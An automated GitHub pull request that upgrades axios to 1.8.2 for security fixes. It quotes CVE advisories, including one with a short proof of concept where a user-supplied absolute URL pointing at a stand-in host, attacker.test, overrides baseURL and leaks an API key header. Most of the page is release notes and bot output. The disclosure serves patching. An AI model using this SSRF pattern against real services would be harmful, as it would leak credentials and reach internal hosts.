Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

fix(deps): update dependency axios to v1.8.2 [security] #1109

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

fix(deps): update dependency axios to v1.8.2 [security] #1109

wants to merge 1 commit into from

Conversation

renovate[bot]
Copy link
Contributor

@renovate renovate bot commented Nov 10, 2023
edited
Loading

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
axios (source) ^0.26.1 -> ^1.0.0 age adoption passing confidence
axios (source) 1.5.0 -> 1.8.2 age adoption passing confidence

Warning

Some dependencies could not be looked up. Check the Dependency Dashboard for more information.

GitHub Vulnerability Alerts

CVE-2023-45857

An issue discovered in Axios 0.8.1 through 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.

CVE-2024-39338

axios 1.7.2 allows SSRF via unexpected behavior where requests for path relative URLs get processed as protocol relative URLs.

CVE-2025-27152

Summary

A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery).
Reference: axios/axios#6463

A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.

Details

Consider the following code snippet:

import axios from "axios";

const internalAPIClient = axios.create({
  baseURL: "http://example.test/api/v1/users/",
  headers: {
    "X-API-KEY": "1234567890",
  },
});

// const userId = "123";
const userId = "http://attacker.test/";

await internalAPIClient.get(userId); // SSRF

In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.

It is recommended that:

  • When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL.
  • Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL.

PoC

Follow the steps below to reproduce the issue:

  1. Set up two simple HTTP servers:
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html 
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
  1. Create a script (e.g., main.js):
import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
  1. Run the script:
$ node main.js
this is server2

Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/.

Impact

  • Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
  • SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
  • Affected Users: Software that uses baseURL and does not validate path parameters is affected by this issue.

Release Notes

axios/axios (axios)

v1.8.2

Compare Source

Bug Fixes
  • http-adapter: add allowAbsoluteUrls to path building (#​6810) (fb8eec2)
Contributors to this release

v1.8.1

Compare Source

Bug Fixes
  • utils: move generateString to platform utils to avoid importing crypto module into client builds; (#​6789) (36a5a62)
Contributors to this release

v1.8.0

Compare Source

Bug Fixes
Features
Reverts
BREAKING CHANGES

  • code relying on the above will now combine the URLs instead of prefer request URL

  • feat: add config option for allowing absolute URLs

  • fix: add default value for allowAbsoluteUrls in buildFullPath

  • fix: typo in flow control when setting allowAbsoluteUrls

Contributors to this release

1.7.9 (2024-12-04)

Reverts
Contributors to this release

1.7.8 (2024-11-25)

Bug Fixes
Contributors to this release

1.7.7 (2024-08-31)

Bug Fixes
  • fetch: fix stream handling in Safari by fallback to using a stream reader instead of an async iterator; (#​6584) (d198085)
  • http: fixed support for IPv6 literal strings in url (#​5731) (364993f)
Contributors to this release

1.7.6 (2024-08-30)

Bug Fixes
Contributors to this release

1.7.5 (2024-08-23)

Bug Fixes
  • adapter: fix undefined reference to hasBrowserEnv (#​6572) (7004707)
  • core: add the missed implementation of AxiosError#status property; (#​6573) (6700a8a)
  • core: fix ReferenceError: navigator is not defined for custom environments; (#​6567) (fed1a4b)
  • fetch: fix credentials handling in Cloudflare workers (#​6533) (550d885)
Contributors to this release

1.7.4 (2024-08-13)

Bug Fixes
Contributors to this release

1.7.3 (2024-08-01)

Bug Fixes
Contributors to this release

1.7.2 (2024-05-21)

Bug Fixes
Contributors to this release

1.7.1 (2024-05-20)

Bug Fixes
  • fetch: fixed ReferenceError issue when TextEncoder is not available in the environment; (#​6410) (733f15f)
Contributors to this release

v1.7.9

Compare Source

Reverts
Contributors to this release

v1.7.8

Compare Source

Bug Fixes
Contributors to this release

v1.7.7

Compare Source

Bug Fixes
  • fetch: fix stream handling in Safari by fallback to using a stream reader instead of an async iterator; (#​6584) (d198085)
  • http: fixed support for IPv6 literal strings in url (#​5731) (364993f)
Contributors to this release

v1.7.6

Compare Source

Bug Fixes
Contributors to this release

v1.7.5

Compare Source

Bug Fixes
  • adapter: fix undefined reference to hasBrowserEnv (#​6572) (7004707)
  • core: add the missed implementation of AxiosError#status property; (#​6573) (6700a8a)
  • core: fix ReferenceError: navigator is not defined for custom environments; (#​6567) (fed1a4b)
  • fetch: fix credentials handling in Cloudflare workers (#​6533) (550d885)
Contributors to this release

v1.7.4

Compare Source

Bug Fixes
Contributors to this release

v1.7.3

Compare Source

Bug Fixes
Contributors to this release

v1.7.2

Compare Source

Bug Fixes
Contributors to this release

v1.7.1

Compare Source

Bug Fixes
  • fetch: fixed ReferenceError issue when TextEncoder is not available in the environment; (#​6410) (733f15f)
Contributors to this release

v1.7.0

Compare Source

Features
Bug Fixes
Contributors to this release

v1.6.8

Compare Source

Bug Fixes
  • AxiosHeaders: fix AxiosHeaders conversion to an object during config merging (#​6243) (2656612)
  • import: use named export for EventEmitter; (7320430)
  • vulnerability: update follow-redirects to 1.15.6 (#​6300) (8786e0f)
Contributors to this release

v1.6.7

Compare Source

Bug Fixes
  • capture async stack only for rejections with native error objects; (#​6203) (1a08f90)
Contributors to this release

v1.6.6

Compare Source

Bug Fixes
Contributors to this release

v1.6.5

Compare Source

Bug Fixes
Contributors to this release

v1.6.4

Compare Source

Bug Fixes
  • security: fixed formToJSON prototype pollution vulnerability; (#​6167) (3c0c11c)
  • security: fixed security vulnerability in follow-redirects (#​6163) (75af1cd)
Contributors to this release

v1.6.3

Compare Source

Bug Fixes
Contributors to this release

v1.6.2

Compare Source

Features
  • withXSRFToken: added withXSRFToken option as a workaround to achieve the old withCredentials behavior; (#​6046) (cff9967)
PRs
  • feat(withXSRFToken): added withXSRFToken option as a workaround to achieve the old `withCredentials` behavior; ( #​6046 )

📢 This PR added 'withXSRFToken' option as a replacement for old withCredentials behaviour. 
You should now use withXSRFToken along with withCredential to get the old behavior.
This functionality is considered as a fix.
Contributors to this release

v1.6.1

Compare Source

Bug Fixes
  • formdata: fixed content-type header normalization for non-standard browser environments; (#​6056) (dd465ab)
  • platform: fixed emulated browser detection in node.js environment; (#​6055) (3dc8369)
Contributors to this release
PRs
  • feat(withXSRFToken): added withXSRFToken option as a workaround to achieve the old `withCredentials` behavior; ( #​6046 )

📢 This PR added 'withXSRFToken' option as a replacement for old withCredentials behaviour. 
You should now use withXSRFToken along with withCredential to get the old behavior.
This functionality is considered as a fix.

v1.6.0

Compare Source

Bug Fixes
PRs

⚠️ Critical vulnerability fix. See https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459
Contributors to this release

1.5.1 (2023-09-26)

Bug Fixes
  • adapters: improved adapters loading logic to have clear error messages; (#​5919) (e410779)
  • formdata: fixed automatic addition of the Content-Type header for FormData in non-browser environments; (#​5917) (bc9af51)
  • headers: allow content-encoding header to handle case-insensitive values (#​5890) (#​5892) (4c89f25)
  • types: removed duplicated code (9e62056)
Contributors to this release
PRs

⚠️ Critical vulnerability fix. See https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459

v1.5.1

Compare Source

Bug Fixes
  • adapters: improved adapters loading logic to have clear error messages; (#​5919) (e410779)
  • formdata: fixed automatic addition of the Content-Type header for FormData in non-browser environments; (#​5917) (bc9af51)
  • headers: allow content-encoding header to handle case-insensitive values (#​5890) (#​5892) (4c89f25)
  • types: removed duplicated code (9e62056)
Contributors to this release

Configuration

📅 Schedule: Branch creation - "" in timezone Europe/Paris, Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about these updates again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@sonarqubecloud SonarQubeCloud
Copy link

Kudos, SonarCloud Quality Gate passed!    Quality Gate passed

Bug A 0 Bugs
Vulnerability A 0 Vulnerabilities
Security Hotspot A 0 Security Hotspots
Code Smell A 0 Code Smells

No Coverage information No Coverage information
0.0% 0.0% Duplication

@renovate renovate bot changed the title fix(deps): update dependency axios to v1 [security] fix(deps): update dependency axios to v1.6.0 [security] Nov 11, 2023
@renovate renovate bot changed the title fix(deps): update dependency axios to v1.6.0 [security] fix(deps): update dependency axios to v1 [security] Nov 15, 2023
@renovate renovate bot force-pushed the renovate/npm-axios-vulnerability branch from 0d6de8c to e8ef238 Compare December 22, 2023 15:54
@sonarqubecloud SonarQubeCloud
Copy link

Quality Gate Passed Quality Gate passed

Kudos, no new issues were introduced!

0 New issues
0 Security Hotspots
No data about Coverage
0.0% Duplication on New Code

See analysis details on SonarCloud

@renovate renovate bot changed the title fix(deps): update dependency axios to v1 [security] fix(deps): update dependency axios to v1 [security] - autoclosed Feb 20, 2024
@renovate renovate bot closed this Feb 20, 2024
@renovate renovate bot deleted the renovate/npm-axios-vulnerability branch February 20, 2024 22:03
@renovate renovate bot changed the title fix(deps): update dependency axios to v1 [security] - autoclosed fix(deps): update dependency axios to v1 [security] Feb 21, 2024
@renovate renovate bot reopened this Feb 21, 2024
@renovate renovate bot restored the renovate/npm-axios-vulnerability branch February 21, 2024 04:44
@socket-security Socket Security
Copy link

socket-security bot commented Feb 21, 2024
edited
Loading

👍 Dependency issues cleared. Learn more about Socket for GitHub ↗︎

This PR previously contained dependency changes with security issues that have been resolved, removed, or ignored.

View full report↗︎

@renovate renovate bot changed the title fix(deps): update dependency axios to v1 [security] fix(deps): update dependency axios to v1.6.0 [security] Feb 21, 2024
@renovate renovate bot force-pushed the renovate/npm-axios-vulnerability branch from e8ef238 to 83e3adc Compare February 21, 2024 20:04
@renovate renovate bot changed the title fix(deps): update dependency axios to v1.6.0 [security] fix(deps): update dependency axios [security] Feb 21, 2024
@renovate renovate bot force-pushed the renovate/npm-axios-vulnerability branch from 83e3adc to fffc295 Compare February 21, 2024 21:45
@renovate renovate bot force-pushed the renovate/npm-axios-vulnerability branch from fffc295 to 4310ed5 Compare March 4, 2024 09:06
@renovate renovate bot changed the title fix(deps): update dependency axios [security] fix(deps): update dependency axios to ^0.28.0 [security] Mar 4, 2024
@sonarqubecloud SonarQubeCloud
Copy link

sonarqubecloud bot commented Mar 4, 2024

Quality Gate Passed Quality Gate passed

Issues
0 New issues
0 Accepted issues

Measures
0 Security Hotspots
No data about Coverage
0.0% Duplication on New Code

See analysis details on SonarCloud

@renovate renovate bot force-pushed the renovate/npm-axios-vulnerability branch from 4310ed5 to bec5a60 Compare April 4, 2024 14:43
@renovate renovate bot force-pushed the renovate/npm-axios-vulnerability branch from bec5a60 to 05c5601 Compare April 8, 2024 14:52
@renovate renovate bot force-pushed the renovate/npm-axios-vulnerability branch from 05c5601 to a65b30d Compare May 2, 2024 08:16
@sonarqubecloud SonarQubeCloud
Copy link

sonarqubecloud bot commented May 2, 2024

Quality Gate Passed Quality Gate passed

Issues
0 New issues
0 Accepted issues

Measures
0 Security Hotspots
No data about Coverage
0.0% Duplication on New Code

See analysis details on SonarCloud

@renovate renovate bot changed the title fix(deps): update dependency axios to ^0.28.0 [security] fix(deps): update dependency axios [security] Aug 6, 2024
@renovate Renovate
Copy link
Contributor Author

renovate bot commented Aug 6, 2024
edited
Loading

⚠️ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

  • any of the package files in this branch needs updating, or
  • the branch becomes conflicted, or
  • you click the rebase/retry checkbox if found above, or
  • you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: yarn.lock
➤ YN0000: ┌ Resolution step
➤ YN0002: │ @aws-sdk/token-providers@npm:3.525.0 doesn't provide @aws-sdk/credential-provider-node (pcac39), requested by @aws-sdk/client-sso-oidc
➤ YN0002: │ @lerna/version@npm:5.6.2 doesn't provide nx (p20b2d), requested by @nrwl/devkit
➤ YN0002: │ @shared/utils@workspace:shared/utils doesn't provide @swc/core (pdcd0b), requested by @swc/jest
➤ YN0002: │ @socialgouv/cdtn-ui@npm:4.102.2 doesn't provide react (p25b1e), requested by @reach/dialog
➤ YN0002: │ @socialgouv/cdtn-ui@npm:4.102.2 doesn't provide react (p2322a), requested by @socialgouv/react-accessible-accordion
➤ YN0002: │ @socialgouv/cdtn-ui@npm:4.102.2 doesn't provide react (pda81a), requested by react-feather
➤ YN0002: │ @socialgouv/cdtn-ui@npm:4.102.2 doesn't provide react (pc8483), requested by react-tabs
➤ YN0002: │ @socialgouv/cdtn-ui@npm:4.102.2 doesn't provide react (pae870), requested by styled-components
➤ YN0002: │ @socialgouv/cdtn-ui@npm:4.102.2 doesn't provide react (p5018a), requested by use-onclickoutside
➤ YN0002: │ @socialgouv/cdtn-ui@npm:4.102.2 doesn't provide react-dom (p7bd1d), requested by @reach/dialog
➤ YN0002: │ @socialgouv/cdtn-ui@npm:4.102.2 doesn't provide react-dom (p315a7), requested by @socialgouv/react-accessible-accordion
➤ YN0002: │ @socialgouv/cdtn-ui@npm:4.102.2 doesn't provide react-dom (p463ae), requested by styled-components
➤ YN0002: │ @socialgouv/cdtn-ui@npm:4.102.2 doesn't provide react-is (p5206e), requested by styled-components
➤ YN0002: │ @tiptap/starter-kit@npm:2.1.12 doesn't provide @tiptap/pm (p6560d), requested by @tiptap/core
➤ YN0002: │ @tiptap/starter-kit@npm:2.1.12 doesn't provide @tiptap/pm (p1fe9b), requested by @tiptap/extension-code-block
➤ YN0002: │ @tiptap/starter-kit@npm:2.1.12 doesn't provide @tiptap/pm (pda644), requested by @tiptap/extension-dropcursor
➤ YN0002: │ @tiptap/starter-kit@npm:2.1.12 doesn't provide @tiptap/pm (pa1b36), requested by @tiptap/extension-gapcursor
➤ YN0002: │ @tiptap/starter-kit@npm:2.1.12 doesn't provide @tiptap/pm (p6fff9), requested by @tiptap/extension-history
➤ YN0002: │ @tiptap/starter-kit@npm:2.1.12 doesn't provide @tiptap/pm (p85123), requested by @tiptap/extension-horizontal-rule
➤ YN0002: │ babel-plugin-styled-components@npm:2.1.4 [bb3ef] doesn't provide @babel/core (p6f303), requested by @babel/plugin-syntax-jsx
➤ YN0060: │ frontend@workspace:targets/frontend provides @mui/material (pddd60) with version 5.14.20, which doesn't satisfy what @mui/x-date-pickers requests
➤ YN0002: │ frontend@workspace:targets/frontend doesn't provide @testing-library/dom (p3b203), requested by @testing-library/user-event
➤ YN0002: │ frontend@workspace:targets/frontend doesn't provide @tiptap/core (p76d20), requested by @tiptap-pro/extension-details-content
➤ YN0002: │ frontend@workspace:targets/frontend doesn't provide @tiptap/core (p17edc), requested by @tiptap-pro/extension-details-summary
➤ YN0002: │ frontend@workspace:targets/frontend doesn't provide @tiptap/core (pd7d9d), requested by @tiptap-pro/extension-details
➤ YN0002: │ frontend@workspace:targets/frontend doesn't provide @tiptap/core (pb6f97), requested by @tiptap/extension-link
➤ YN0002: │ frontend@workspace:targets/frontend doesn't provide @tiptap/core (p06ec2), requested by @tiptap/extension-placeholder
➤ YN0002: │ frontend@workspace:targets/frontend doesn't provide @tiptap/core (pb36e0), requested by @tiptap/extension-table-cell
➤ YN0002: │ frontend@workspace:targets/frontend doesn't provide @tiptap/core (pe4bdb), requested by @tiptap/extension-table-header
➤ YN0002: │ frontend@workspace:targets/frontend doesn't provide @tiptap/core (p2de94), requested by @tiptap/extension-table-row
➤ YN0002: │ frontend@workspace:targets/frontend doesn't provide @tiptap/core (p2e5c3), requested by @tiptap/extension-table
➤ YN0002: │ frontend@workspace:targets/frontend doesn't provide @tiptap/core (pbd616), requested by @tiptap/react
➤ YN0060: │ frontend@workspace:targets/frontend provides react (pf2b7a) with version 18.2.0, which doesn't satisfy what @reach/accordion and some of its descendants request
➤ YN0060: │ frontend@workspace:targets/frontend provides react (p6bbce) with version 18.2.0, which doesn't satisfy what @reach/dialog and some of its descendants request
➤ YN0060: │ frontend@workspace:targets/frontend provides react (p33600) with version 18.2.0, which doesn't satisfy what @reach/menu-button and some of its descendants request
➤ YN0060: │ frontend@workspace:targets/frontend provides react (pfc100) with version 18.2.0, which doesn't satisfy what @reach/visually-hidden requests
➤ YN0060: │ frontend@workspace:targets/frontend provides react (p90d1a) with version 18.2.0, which doesn't satisfy what react-sortable-hoc requests
➤ YN0060: │ frontend@workspace:targets/frontend provides react-dom (p19c5b) with version 18.2.0, which doesn't satisfy what @reach/accordion and some of its descendants request
➤ YN0060: │ frontend@workspace:targets/frontend provides react-dom (p3bf58) with version 18.2.0, which doesn't satisfy what @reach/dialog and some of its descendants request
➤ YN0060: │ frontend@workspace:targets/frontend provides react-dom (p9cf59) with version 18.2.0, which doesn't satisfy what @reach/menu-button and some of its descendants request
➤ YN0060: │ frontend@workspace:targets/frontend provides react-dom (p29f85) with version 18.2.0, which doesn't satisfy what @reach/visually-hidden requests
➤ YN0060: │ frontend@workspace:targets/frontend provides react-dom (pe4e63) with version 18.2.0, which doesn't satisfy what react-sortable-hoc requests
➤ YN0002: │ frontend@workspace:targets/frontend doesn't provide react-is (pd0ac5), requested by @reach/menu-button
➤ YN0060: │ ingester@workspace:targets/ingester provides typescript (p0efae) with version 5.4.3, which doesn't satisfy what ts-jest requests
➤ YN0000: │ Some peer dependencies are incorrectly met; run yarn explain peer-requirements <hash> for details, where <hash> is the six-letter p-prefixed code
➤ YN0000: └ Completed in 0s 962ms
➤ YN0000: ┌ Fetch step
➤ YN0035: │ @tiptap-pro/extension-details-summary@npm:2.3.3: The remote server failed to provide the requested resource
➤ YN0035: │   Response Code: 403 (Forbidden)
➤ YN0035: │   Request Method: GET
➤ YN0035: │   Request URL: https://registry.tiptap.dev/@tiptap-pro/extension-details-summary/-/extension-details-summary-2.3.3.tgz
➤ YN0035: │ @tiptap-pro/extension-details@npm:2.3.3: The remote server failed to provide the requested resource
➤ YN0035: │   Response Code: 403 (Forbidden)
➤ YN0035: │   Request Method: GET
➤ YN0035: │   Request URL: https://registry.tiptap.dev/@tiptap-pro/extension-details/-/extension-details-2.3.3.tgz
➤ YN0035: │ @tiptap-pro/extension-details-content@npm:2.3.3: The remote server failed to provide the requested resource
➤ YN0035: │   Response Code: 403 (Forbidden)
➤ YN0035: │   Request Method: GET
➤ YN0035: │   Request URL: https://registry.tiptap.dev/@tiptap-pro/extension-details-content/-/extension-details-content-2.3.3.tgz
➤ YN0013: │ 2028 packages were already cached, 5 had to be fetched
➤ YN0000: └ Completed in 2s 282ms
➤ YN0000: Failed with errors in 3s 248ms

@renovate renovate bot force-pushed the renovate/npm-axios-vulnerability branch from a65b30d to 62c67f7 Compare August 22, 2024 08:03
@sonarqubecloud SonarQubeCloud
Copy link

Quality Gate Passed Quality Gate passed

Issues
0 New issues
0 Accepted issues

Measures
0 Security Hotspots
0.0% Coverage on New Code
0.0% Duplication on New Code

See analysis details on SonarCloud

@renovate renovate bot changed the title fix(deps): update dependency axios [security] fix(deps): update dependency axios [security] - autoclosed Dec 8, 2024
@renovate renovate bot closed this Dec 8, 2024
@renovate renovate bot deleted the renovate/npm-axios-vulnerability branch December 8, 2024 18:35
@renovate renovate bot changed the title fix(deps): update dependency axios [security] - autoclosed fix(deps): update dependency axios [security] Dec 8, 2024
@renovate renovate bot reopened this Dec 8, 2024
@renovate renovate bot force-pushed the renovate/npm-axios-vulnerability branch from 1e194d3 to 62c67f7 Compare December 8, 2024 21:15
@sonarqubecloud SonarQubeCloud
Copy link

sonarqubecloud bot commented Dec 8, 2024

Quality Gate Passed Quality Gate passed

Issues
0 New issues
0 Accepted issues

Measures
0 Security Hotspots
0.0% Coverage on New Code
0.0% Duplication on New Code

See analysis details on SonarQube Cloud

@renovate renovate bot force-pushed the renovate/npm-axios-vulnerability branch from 62c67f7 to 5c6fcdc Compare March 8, 2025 12:44
@renovate renovate bot changed the title fix(deps): update dependency axios [security] fix(deps): update dependency axios to v1.8.2 [security] Mar 8, 2025
@sonarqubecloud SonarQubeCloud
Copy link

sonarqubecloud bot commented Mar 8, 2025

Quality Gate Passed Quality Gate passed

Issues
0 New issues
0 Accepted issues

Measures
0 Security Hotspots
0.0% Coverage on New Code
0.0% Duplication on New Code

See analysis details on SonarQube Cloud

@socket-security Socket Security
Copy link

New and removed dependencies detected. Learn more about Socket for GitHub ↗︎

Package New capabilities Transitives Size Publisher
npm/@lerna/[email protected] filesystem 0 15.9 kB jameshenry
npm/@lerna/[email protected] environment 0 3.34 kB jameshenry
npm/@lerna/[email protected] environment, network 0 3.83 kB jameshenry
npm/@lerna/[email protected] None 0 3.73 kB jameshenry
npm/@lerna/[email protected] None 0 2.2 kB jameshenry
npm/[email protected] None 0 5.59 kB sindresorhus

View full report↗︎

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
dependencies
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
0 participants